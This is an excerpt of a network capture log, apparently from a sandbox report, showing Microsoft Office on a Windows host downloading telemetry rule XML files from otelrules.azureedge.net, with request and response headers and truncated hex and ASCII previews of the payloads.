2024-11-11 00:15:09 UTC	192	OUT	GET /rules/rule120680v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 00:15:09 UTC	494	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 00:15:09 GMT Content-Type: text/xml Content-Length: 1952 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT ETag: "0x8DC582B956B0F3D" x-ms-request-id: 8b89db2d-001e-0028-2ea9-30c49f000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T001509Z-17df447cdb57srlrhC1DFWwgas00000009z0000000005su1 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 00:15:09 UTC	1952	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 31 22 20 47 3d 22 7b 62 31 36 37 36 61 63 33 2d 37 66 65 65 2d 34 34 61 39 2d 39 61 30 65 2d 64 62 62 30 62 34 39 36 65 66 61 35 7d 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 33 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120680" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <SS T="1" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> <R T="2" R="120682" /> <F T="3"> <O T="LT"> <L>

Session ID	Source IP	Source Port	Destination IP	Destination Port
84	192.168.2.4	49844	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 00:15:09 UTC	192	OUT	GET /rules/rule120682v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 00:15:09 UTC	491	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 00:15:09 GMT Content-Type: text/xml Content-Length: 501 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:18 GMT ETag: "0x8DC582BACFDAACD" x-ms-request-id: 6028abc9-b01e-0002-6508-2c1b8f000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T001509Z-16547b76f7fkj7j4hC1DFW0a9g0000000db000000000c43d x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 00:15:09 UTC	501	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 53 74 61 72 74 75 70 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 62 31 36 37 36 61 63 33 2d 37 66 65 65 2d 34 34 61 39 2d 39 61 30 65 2d 64 62 62 30 62 34 39 36 65 66 61 35 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120682" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <A T="1" E="TelemetryStartup" /> <R T="2" R="120100" /> <SS T="3" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> </S> <C T="

Session ID	Source IP	Source Port	Destination IP	Destination Port
85	192.168.2.4	49843	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 00:15:09 UTC	192	OUT	GET /rules/rule120681v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 00:15:09 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 00:15:09 GMT Content-Type: text/xml Content-Length: 958 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:58 GMT ETag: "0x8DC582BA0A31B3B" x-ms-request-id: 12eeda2a-401e-00ac-598e-2d0a97000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T001509Z-15869dbbcc6x4rp4hC1DFW3t7w0000000fng00000000ah5f x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 00:15:09 UTC	958	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 38 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 38 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 33 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120681" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120608" /> <R T="2" R="120680" /> <TH T="3"> <O T="AND"> <L> <O T="EQ"> <L>

Session ID	Source IP	Source Port	Destination IP	Destination Port
86	192.168.2.4	49845	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 00:15:09 UTC	193	OUT	GET /rules/rule120602v10s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 00:15:09 UTC	515	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 00:15:09 GMT Content-Type: text/xml Content-Length: 2592 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT ETag: "0x8DC582BB5B890DB" x-ms-request-id: 289a03c5-801e-0015-6466-2ff97f000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T001509Z-15869dbbcc6xpvqthC1DFWq7d800000006u000000000enkz x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 00:15:09 UTC	2592	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 32 22 20 56 3d 22 31 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 41 70 70 6c 69 63 61 74 69 6f 6e 41 6e 64 4c 61 6e 67 75 61 67 65 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120602" V="10" DC="SM" EN="Office.System.SystemHealthMetadataApplicationAndLanguage" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa=

Session ID	Source IP	Source Port	Destination IP	Destination Port
87	192.168.2.4	49837	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 00:15:09 UTC	192	OUT	GET /rules/rule120676v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 00:15:09 UTC	491	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 00:15:09 GMT Content-Type: text/xml Content-Length: 472 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT ETag: "0x8DC582B984BF177" x-ms-request-id: 9ec2e68b-201e-0096-6cd2-2cace6000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T001509Z-16547b76f7fj897nhC1DFWdwq40000000d9g000000003mhr x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 00:15:09 UTC	472	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120676" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
88	192.168.2.4	49847	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 00:15:10 UTC	192	OUT	GET /rules/rule120601v3s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 00:15:10 UTC	538	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 00:15:10 GMT Content-Type: text/xml Content-Length: 3342 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:34 GMT ETag: "0x8DC582B927E47E9" x-ms-request-id: 659aa3e6-801e-008f-64d2-2c2c5d000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T001510Z-16547b76f7fcjqqhhC1DFWrrrc0000000d8g00000000mh9k x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 00:15:10 UTC	3342	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 31 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 4f 53 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120601" V="3" DC="SM" EN="Office.System.SystemHealthMetadataOS" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC" xmlns=""> <RI

Session ID	Source IP	Source Port	Destination IP	Destination Port
89	192.168.2.4	49848	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 00:15:10 UTC	193	OUT	GET /rules/rule224901v11s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 00:15:10 UTC	494	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 00:15:10 GMT Content-Type: text/xml Content-Length: 2284 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:13 GMT ETag: "0x8DC582BCD58BEEE" x-ms-request-id: a14a0ed7-201e-0096-78aa-31ace6000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T001510Z-15869dbbcc6b2ncxhC1DFWu4ss00000003z000000000ayc1 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 00:15:10 UTC	2284	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 31 22 20 56 3d 22 31 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4c 69 63 65 6e 73 69 6e 67 2e 4f 66 66 69 63 65 43 6c 69 65 6e 74 4c 69 63 65 6e 73 69 6e 67 2e 44 6f 4c 69 63 65 6e 73 65 56 61 6c 69 64 61 74 69 6f 6e 22 20 41 54 54 3d 22 63 31 61 30 64 62 30 31 32 37 39 36 34 36 37 34 61 30 64 36 32 66 64 65 35 61 62 30 66 65 36 32 2d 36 65 63 34 61 63 34 35 2d 63 65 62 63 2d 34 66 38 30 2d 61 61 38 33 2d 62 36 62 39 64 33 61 38 36 65 64 37 2d 37 37 31 39 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 54 3d 22 55 70 6c 6f 61 64 2d 4d 65 64 69 75 6d 22 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224901" V="11" DC="SM" EN="Office.Licensing.OfficeClientLicensing.DoLicenseValidation" ATT="c1a0db0127964674a0d62fde5ab0fe62-6ec4ac45-cebc-4f80-aa83-b6b9d3a86ed7-7719" SP="CriticalCensus" T="Upload-Medium"

Session ID	Source IP	Source Port	Destination IP	Destination Port
90	192.168.2.4	49849	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 00:15:10 UTC	192	OUT	GET /rules/rule701201v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 00:15:10 UTC	494	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 00:15:10 GMT Content-Type: text/xml Content-Length: 1393 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:51 GMT ETag: "0x8DC582BE3E55B6E" x-ms-request-id: 09b57a0e-d01e-0066-0eaa-30ea17000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T001510Z-17df447cdb5g2j9ghC1DFWuyag00000003t000000000mup7 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 00:15:10 UTC	1393	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 58 61 6d 6c 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 58 61 6d 6c 22 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml"

Session ID	Source IP	Source Port	Destination IP	Destination Port
91	192.168.2.4	49851	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 00:15:10 UTC	192	OUT	GET /rules/rule700201v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 00:15:10 UTC	515	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 00:15:10 GMT Content-Type: text/xml Content-Length: 1393 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:50 GMT ETag: "0x8DC582BE39DFC9B" x-ms-request-id: 197d537f-e01e-0085-240a-32c311000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T001510Z-15869dbbcc6lq45jhC1DFWbkc80000000750000000009zq0 x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 00:15:10 UTC	1393	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 57 6f 72 64 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 57 6f 72 64 22 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord"

Session ID	Source IP	Source Port	Destination IP	Destination Port
92	192.168.2.4	49850	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 00:15:10 UTC	192	OUT	GET /rules/rule701200v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 00:15:10 UTC	494	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 00:15:10 GMT Content-Type: text/xml Content-Length: 1356 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT ETag: "0x8DC582BDC681E17" x-ms-request-id: 7bed9db9-501e-0035-31d4-2fc923000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T001510Z-17df447cdb5qkskwhC1DFWeeg400000009z0000000009hbc x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 00:15:10 UTC	1356	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 58 61 6d 6c 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 58 61 6d 6c 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port
93	192.168.2.4	49852	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 00:15:10 UTC	192	OUT	GET /rules/rule700200v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 00:15:11 UTC	494	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 00:15:10 GMT Content-Type: text/xml Content-Length: 1356 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT ETag: "0x8DC582BDF66E42D" x-ms-request-id: 39db3ff9-e01e-0099-3b50-32da8a000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T001510Z-17df447cdb54ntx4hC1DFW2k4000000009yg000000001rcq x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 00:15:11 UTC	1356	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 57 6f 72 64 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 57 6f 72 64 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port
94	192.168.2.4	49853	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 00:15:11 UTC	192	OUT	GET /rules/rule702351v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 00:15:11 UTC	515	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 00:15:11 GMT Content-Type: text/xml Content-Length: 1395 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT ETag: "0x8DC582BE017CAD3" x-ms-request-id: b51813c1-401e-002a-5f12-32c62e000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T001511Z-16547b76f7fkcrm9hC1DFWxdag0000000df000000000bmhm x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 00:15:11 UTC	1395	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 6f 69 63 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 